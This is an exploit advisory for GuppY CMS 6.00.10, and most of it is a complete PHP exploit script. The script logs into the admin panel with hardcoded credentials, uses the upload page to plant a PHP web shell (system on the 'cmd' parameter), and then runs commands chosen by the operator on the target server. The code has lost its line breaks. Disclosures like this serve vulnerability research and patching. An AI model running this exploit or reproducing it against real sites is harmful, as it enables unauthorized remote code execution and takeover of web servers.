Headline
GuppY CMS 6.00.10 Shell Upload
GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.
# Exploit Title: GuppY 6.00.10 CMS Remote Code Execution# Date: Sep 30, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.freeguppy.org/# Software Link:https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2# Version: 6.00.10# Tested on: Linux#!/usr/bin/php<?php$username = "Admin"; //Administrator username$password = "rose1337"; //Administrator password$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");$target = $options['u'];$command = $options['c'];// Administrator login$cookie="cookie.txt";$url = "{$target}guppy/connect.php";$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;$curlObj = curl_init();curl_setopt($curlObj, CURLOPT_URL, $url);curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curlObj, CURLOPT_HEADER, 1);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);curl_setopt ($curlObj, CURLOPT_POST, 1);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$result = curl_exec($curlObj);// uploading shell$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";$post='------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="rep"file------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="ficup"; filename="shell.php"Content-Type: application/x-php<?php system($_GET["cmd"]); ?>------WebKitFormBoundarygA1APFcUlkIaWal4--';$headers = array( 'Content-Type: multipart/form-data;boundary=----WebKitFormBoundarygA1APFcUlkIaWal4', 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36', 'Accept-Encoding: gzip, deflate', 'Accept-Language: en-US,en;q=0.9');curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);curl_setopt($curlObj, CURLOPT_URL, $url2);curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);curl_setopt($curlObj, CURLOPT_POST, true);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$data = curl_exec($curlObj);// Executing the shell$shell = "{$target}guppy/file/shell.php?cmd=" .$command;curl_setopt($curlObj, CURLOPT_URL, $shell);curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:application/x-www-form-urlencoded'));curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);curl_setopt($curlObj, CURLOPT_HEADER, False);curl_setopt($curlObj, CURLOPT_POST, false);$exec_shell = curl_exec($curlObj);$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);if($code != 200) { echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check thecredentials\n";}else {print("\n");print($exec_shell);}curl_close($curlObj);?>